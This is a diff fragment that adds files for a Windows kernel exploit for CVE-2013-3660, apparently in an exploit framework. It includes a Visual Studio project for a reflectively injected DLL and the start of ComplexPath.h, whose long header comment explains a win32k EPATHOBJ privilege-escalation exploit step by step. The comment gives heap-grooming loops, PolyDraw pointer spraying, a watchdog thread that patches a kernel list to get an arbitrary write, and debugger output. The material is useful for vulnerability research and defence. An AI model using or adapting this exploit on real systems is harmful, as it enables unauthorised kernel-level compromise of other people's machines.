+    <ProjectConfiguration Include="Release|ARM">
+      <Configuration>Release</Configuration>
+      <Platform>ARM</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
+    <RootNamespace>reflective_dll</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v100</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v110</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+    <PostBuildEvent>
+      <Command>copy ..\Release\reflective_dll.dll ..\bin\</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
+    <ClCompile>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <BufferSecurityCheck>true</BufferSecurityCheck>
+      <CompileAs>Default</CompileAs>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OutputFile>$(OutDir)$(ProjectName).arm.dll</OutputFile>
+    </Link>
+    <PostBuildEvent>
+      <Command>copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <WholeProgramOptimization>false</WholeProgramOptimization>
+      <PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <CompileAs>CompileAsCpp</CompileAs>
+    </ClCompile>
+    <Link>
+      <OutputFile>$(OutDir)$(ProjectName).x64.dll</OutputFile>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+    <PostBuildEvent>
+      <Command>copy $(OutDir)$(ProjectName).x64.dll ..\bin\</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="src\ReflectiveDll.c" />
+    <ClCompile Include="src\ReflectiveLoader.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="src\ComplexPath.h" />
+    <ClInclude Include="src\ReflectiveDLLInjection.h" />
+    <ClInclude Include="src\ReflectiveLoader.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters
new file mode 100755
index 0000000000..15f7cbf646
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="src\ReflectiveDll.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="src\ReflectiveLoader.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="src\ReflectiveDLLInjection.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="src\ReflectiveLoader.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="src\ComplexPath.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h b/external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h
new file mode 100755
index 0000000000..11c4134bb4
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h
@@ -0,0 +1,529 @@
+//
+// --------------------------------------------------
+// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
+// ----------------------------------------- taviso@cmpxchg8b.com -----
+//
+// INTRODUCTION
+//
+// There's a pretty obvious bug in win32k!EPATHOBJ::pprFlattenRec where the
+// PATHREC object returned by win32k!EPATHOBJ::newpathrec doesn't initialise the
+// next list pointer. The bug is really nice, but exploitation when
+// allocations start failing is tricky.
+//
+// ; BOOL __thiscall EPATHOBJ::newpathrec(EPATHOBJ     *this,
+//                                        PATHRECORD   **pppr,
+//                                        ULONG         *pcMax,
+//                                        ULONG cNeeded)
+//  .text:BFA122CA                 mov     esi, [ebp+ppr]
+//  .text:BFA122CD                 mov     eax, [esi+PATHRECORD.pprPrev]
+//  .text:BFA122D0                 push    edi
+//  .text:BFA122D1                 mov     edi, [ebp+pprNew]
+//  .text:BFA122D4                 mov     [edi+PATHRECORD.pprPrev], eax
+//  .text:BFA122D7                 lea     eax, [edi+PATHRECORD.count]
+//  .text:BFA122DA                 xor     edx, edx
+//  .text:BFA122DC                 mov     [eax], edx
+//  .text:BFA122DE                 mov     ecx, [esi+PATHRECORD.flags]
+//  .text:BFA122E1                 and     ecx, not (PD_BEZIER)
+//  .text:BFA122E4                 mov     [edi+PATHRECORD.flags], ecx 
+//  .text:BFA122E7                 mov     [ebp+pprNewCountPtr], eax
+//  .text:BFA122EA                 cmp     [edi+PATHRECORD.pprPrev], edx
+//  .text:BFA122ED                 jnz     short loc_BFA122F7
+//  .text:BFA122EF                 mov     ecx, [ebx+EPATHOBJ.ppath]
+//  .text:BFA122F2                 mov     [ecx+PATHOBJ.pprfirst], edi
+//
+//  It turns out this mostly works because newpathrec() is backed by newpathalloc()
+//  which uses PALLOCMEM(). PALLOCMEM() will always zero the buffer returned.
+//
+//  ; PVOID __stdcall PALLOCMEM(size_t size, int tag)
+//  .text:BF9160D7                 xor     esi, esi
+//  .text:BF9160DE                 push    esi
+//  .text:BF9160DF                 push    esi
+//  .text:BF9160E0                 push    [ebp+tag]
+//  .text:BF9160E3                 push    [ebp+size]
+//  .text:BF9160E6                 call    _HeavyAllocPool@16 ; HeavyAllocPool(x,x,x,x)
+//  .text:BF9160EB                 mov     esi, eax
+//  .text:BF9160ED                 test    esi, esi
+//  .text:BF9160EF                 jz      short loc_BF9160FF
+//  .text:BF9160F1                 push    [ebp+size]      ; size_t
+//  .text:BF9160F4                 push    0               ; int
+//  .text:BF9160F6                 push    esi             ; void *
+//  .text:BF9160F7                 call    _memset
+//
+//  However, the PATHALLOC allocator includes it's own freelist implementation, and
+//  if that codepath can satisfy a request the memory isn't zeroed and returned
+//  directly to the caller. This effectively means that we can add our own objects
+//  to the PATHRECORD chain.
+//
+//  We can force this behaviour under memory pressure relatively easily, I just
+//  spam HRGN objects until they start failing. This isn't super reliable, but it's
+//  good enough for testing.
+//
+//          // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
+//          // failure. Seriously, do some damn QA Microsoft, wtf.
+//          for (Size = 1 << 26; Size; Size >>= 1) {
+//              while (CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
+//                  ;
+//          }
+//
+//  Adding user controlled blocks to the freelist is a little trickier, but I've
+//  found that flattening large lists of bezier curves added with PolyDraw() can
+//  accomplish this reliably. The code to do this is something along the lines of:
+//
+//          for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
+//              Points[PointNum].x      = 0x41414141 >> 4;
+//              Points[PointNum].y      = 0x41414141 >> 4;
+//              PointTypes[PointNum]    = PT_BEZIERTO;
+//          }
+//
+//          for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) {
+//              BeginPath(Device);
+//              PolyDraw(Device, Points, PointTypes, PointNum);
+//              EndPath(Device);
+//              FlattenPath(Device);
+//              FlattenPath(Device);
+//              EndPath(Device);
+//          }
+//
+//   We can verify this is working by putting a breakpoint after newpathrec, and
+//   verifying the buffer is filled with recognisable values when it returns:
+//
+//   kd> u win32k!EPATHOBJ::pprFlattenRec+1E
+//   win32k!EPATHOBJ::pprFlattenRec+0x1e:
+//   95c922b8 e8acfbffff      call    win32k!EPATHOBJ::newpathrec (95c91e69)
+//   95c922bd 83f801          cmp     eax,1
+//   95c922c0 7407            je      win32k!EPATHOBJ::pprFlattenRec+0x2f (95c922c9)
+//   95c922c2 33c0            xor     eax,eax
+//   95c922c4 e944020000      jmp     win32k!EPATHOBJ::pprFlattenRec+0x273 (95c9250d)
+//   95c922c9 56              push    esi
+//   95c922ca 8b7508          mov     esi,dword ptr [ebp+8]
+//   95c922cd 8b4604          mov     eax,dword ptr [esi+4]
+//   kd> ba e 1 win32k!EPATHOBJ::pprFlattenRec+23 "dd poi(ebp-4) L1; gc"
+//   kd> g
+//   fe938fac  41414140
+//   fe938fac  41414140
+//   fe938fac  41414140
+//   fe938fac  41414140
+//   fe938fac  41414140
+//
+//   The breakpoint dumps the first dword of the returned buffer, which matches the
+//   bezier points set with PolyDraw(). So convincing pprFlattenRec() to move
+//   EPATHOBJ->records->head->next->next into userspace is no problem, and we can
+//   easily break the list traversal in bFlattten():
+//
+//   BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
+//   {
+//     EPATHOBJ *pathobj; // esi@1
+//     PATHOBJ *ppath; // eax@1
+//     BOOL result; // eax@2
+//     PATHRECORD *ppr; // eax@3
+//
+//     pathobj = this;
+//     ppath = this->ppath;
+//     if ( ppath )
+//     {
+//       for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext )
+//       {
+//         if ( ppr->flags & PD_BEZIER )
+//         {
+//           ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
+//           if ( !ppr )
+//             goto LABEL_2;
+//         }
+//       }
+//       pathobj->fl &= 0xFFFFFFFE;
+//       result = 1;
+//     }
+//     else
+//     {
+//   LABEL_2:
+//       result = 0;
+//     }
+//     return result;
+//   }
+//
+//   All we have to do is allocate our own PATHRECORD structure, and then spam
+//   PolyDraw() with POINTFIX structures containing co-ordinates that are actually
+//   pointers shifted right by 4 (for this reason the structure must be aligned so
+//   the bits shifted out are all zero).
+//
+//   We can see this in action by putting a breakpoint in bFlatten when ppr has
+//   moved into userspace:
+//
+//   kd> u win32k!EPATHOBJ::bFlatten
+//   win32k!EPATHOBJ::bFlatten:
+//   95c92517 8bff            mov     edi,edi
+//   95c92519 56              push    esi
+//   95c9251a 8bf1            mov     esi,ecx
+//   95c9251c 8b4608          mov     eax,dword ptr [esi+8]
+//   95c9251f 85c0            test    eax,eax
+//   95c92521 7504            jne     win32k!EPATHOBJ::bFlatten+0x10 (95c92527)
+//   95c92523 33c0            xor     eax,eax
+//   95c92525 5e              pop     esi
+//   kd> u
+//   win32k!EPATHOBJ::bFlatten+0xf:
+//   95c92526 c3              ret
+//   95c92527 8b4014          mov     eax,dword ptr [eax+14h]
+//   95c9252a eb14            jmp     win32k!EPATHOBJ::bFlatten+0x29 (95c92540)
+//   95c9252c f6400810        test    byte ptr [eax+8],10h
+//   95c92530 740c            je      win32k!EPATHOBJ::bFlatten+0x27 (95c9253e)
+//   95c92532 50              push    eax
+//   95c92533 8bce            mov     ecx,esi
+//   95c92535 e860fdffff      call    win32k!EPATHOBJ::pprFlattenRec (95c9229a)
+//
+//   So at 95c9252c eax is ppr->next, and the routine checks for the PD_BEZIERS
+//   flags (defined in winddi.h). Let's break if it's in userspace:
+//
+//   kd> ba e 1 95c9252c "j (eax < poi(nt!MmUserProbeAddress)) 'gc'; ''"
+//   kd> g
+//   95c9252c f6400810        test    byte ptr [eax+8],10h
+//   kd> r
+//   eax=41414140 ebx=95c1017e ecx=97330bec edx=00000001 esi=97330bec edi=0701062d
+//   eip=95c9252c esp=97330be4 ebp=97330c28 iopl=0         nv up ei pl nz na po nc
+//   cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
+//   win32k!EPATHOBJ::bFlatten+0x15:
+//   95c9252c f6400810        test    byte ptr [eax+8],10h       ds:0023:41414148=??
+//
+//   The question is how to turn that into code execution? It's obviously trivial to
+//   call prFlattenRec with our userspace PATHRECORD..we can do that by setting
+//   PD_BEZIER in our userspace PATHRECORD, but the early exit on allocation failure
+//   poses a problem.
+//
+//   Let me demonstrate calling it with my own PATHRECORD:
+//
+//       // Create our PATHRECORD in userspace we will get added to the EPATHOBJ
+//       // pathrecord chain.
+//       PathRecord = VirtualAlloc(NULL,
+//                                 sizeof(PATHRECORD),
+//                                 MEM_COMMIT | MEM_RESERVE,
+//                                 PAGE_EXECUTE_READWRITE);
+//
+//       // Initialise with recognisable debugging values.
+//       FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC);
+//
+//       PathRecord->next    = (PVOID)(0x41414141);
+//       PathRecord->prev    = (PVOID)(0x42424242);
+//
+//       // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
+//       // EPATHOBJ::bFlatten(), do that here.
+//       PathRecord->flags   = PD_BEZIERS;
+//
+//       // Generate a large number of Bezier Curves made up of pointers to our
+//       // PATHRECORD object.
+//       for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
+//           Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
+//           Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
+//           PointTypes[PointNum]    = PT_BEZIERTO;
+//       }
+//
+//   kd> ba e 1 win32k!EPATHOBJ::pprFlattenRec+28 "j (dwo(ebp+8) < dwo(nt!MmUserProbeAddress)) ''; 'gc'"
+//   kd> g
+//   win32k!EPATHOBJ::pprFlattenRec+0x28:
+//   95c922c2 33c0            xor     eax,eax
+//   kd> dd ebp+8 L1
+//   a3633be0  00130000
+//
+//   The ppr object is in userspace! If we peek at it:
+//
+//   kd> dd poi(ebp+8)
+//   00130000  41414141 42424242 00000010 cccccccc
+//   00130010  00000000 00000000 00000000 00000000
+//   00130020  00000000 00000000 00000000 00000000
+//   00130030  00000000 00000000 00000000 00000000
+//   00130040  00000000 00000000 00000000 00000000
+//   00130050  00000000 00000000 00000000 00000000
+//   00130060  00000000 00000000 00000000 00000000
+//   00130070  00000000 00000000 00000000 00000000
+//
+//   There's the next and prev pointer.
+//
+//   kd> kvn
+//    # ChildEBP RetAddr  Args to Child
+//   00 a3633bd8 95c9253a 00130000 002bfea0 95c101ce win32k!EPATHOBJ::pprFlattenRec+0x28 (FPO: [Non-Fpo])
+//   01 a3633be4 95c101ce 00000001 00000294 fe763360 win32k!EPATHOBJ::bFlatten+0x23 (FPO: [0,0,4])
+//   02 a3633c28 829ab173 0701062d 002bfea8 7721a364 win32k!NtGdiFlattenPath+0x50 (FPO: [Non-Fpo])
+//   03 a3633c28 7721a364 0701062d 002bfea8 7721a364 nt!KiFastCallEntry+0x163 (FPO: [0,3] TrapFrame @ a3633c34)
+//
+//   The question is how to get PATHALLOC() to succeed under memory pressure so we
+//   can make this exploitable? I'm quite proud of this list cycle trick,
+//   here's how to turn it into an arbitrary write.
+//
+//   First, we create a watchdog thread that will patch the list atomically
+//   when we're ready. This is needed because we can't exploit the bug while
+//   HeavyAllocPool is failing, because of the early exit in pprFlattenRec:
+//
+//   .text:BFA122B8                 call newpathrec              ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
+//   .text:BFA122BD                 cmp     eax, 1               ; Check for failure
+//   .text:BFA122C0                 jz      short continue
+//   .text:BFA122C2                 xor     eax, eax             ; Exit early
+//   .text:BFA122C4                 jmp     early_exit
+//
+//   So we create a list node like this:
+//
+//   PathRecord->Next    = PathRecord;
+//   PathRecord->Flags   = 0;
+//
+//   Then EPATHOBJ::bFlatten() spins forever doing nothing:
+//
+//   BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
+//   {
+//       /* ... */
+//
+//       for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext )
+//       {
+//         if ( ppr->flags & PD_BEZIER )
+//         {
+//           ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
+//         }
+//       }
+//
+//       /* ... */
+//   }
+//
+//   While it's spinning, we clean up in another thread, then patch the thread (we
+//   can do this, because it's now in userspace) to trigger the exploit. The first
+//   block of pprFlattenRec does something like this:
+//
+//       if ( pprNew->pprPrev )
+//         pprNew->pprPrev->pprnext = pprNew;
+//
+//   Let's make that write to 0xCCCCCCCC.
+//
+//   DWORD WINAPI WatchdogThread(LPVOID Parameter)
+//   {
+//
+//       // This routine waits for a mutex object to timeout, then patches the
+//       // compromised linked list to point to an exploit. We need to do this.
+//       LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex@%p",
+//                          GetCurrentThreadId(),
+//                          Mutex);
+//
+//       if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
+//           // It looks like the main thread is stuck in a call to FlattenPath(),
+//           // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
+//           // up, and then patch the list to trigger our exploit.
+//           while (NumRegion--)
+//               DeleteObject(Regions[NumRegion]);
+//
+//           LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next, &ExploitRecord);
+//
+//           InterlockedExchangePointer(&PathRecord->next, &ExploitRecord);
+//
+//       } else {
+//           LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
+//       }
+//
+//       return 0;
+//   }
+//
+//       PathRecord->next    = PathRecord;
+//       PathRecord->prev    = (PVOID)(0x42424242);
+//       PathRecord->flags   = 0;
+//
+//       ExploitRecord.next  = NULL;
+//       ExploitRecord.prev  = 0xCCCCCCCC;
+//       ExploitRecord.flags = PD_BEZIERS;
+//
+//   Here's the output on Windows 8:
+//
+//   kd> g
+//   *******************************************************************************
+//   *                                                                             *
+//   *                        Bugcheck Analysis                                    *
+//   *                                                                             *
+//   *******************************************************************************
+//
+//   Use !analyze -v to get detailed debugging information.
+//
+//   BugCheck 50, {cccccccc, 1, 8f18972e, 2}
+//   *** WARNING: Unable to verify checksum for ComplexPath.exe
+//   *** ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe
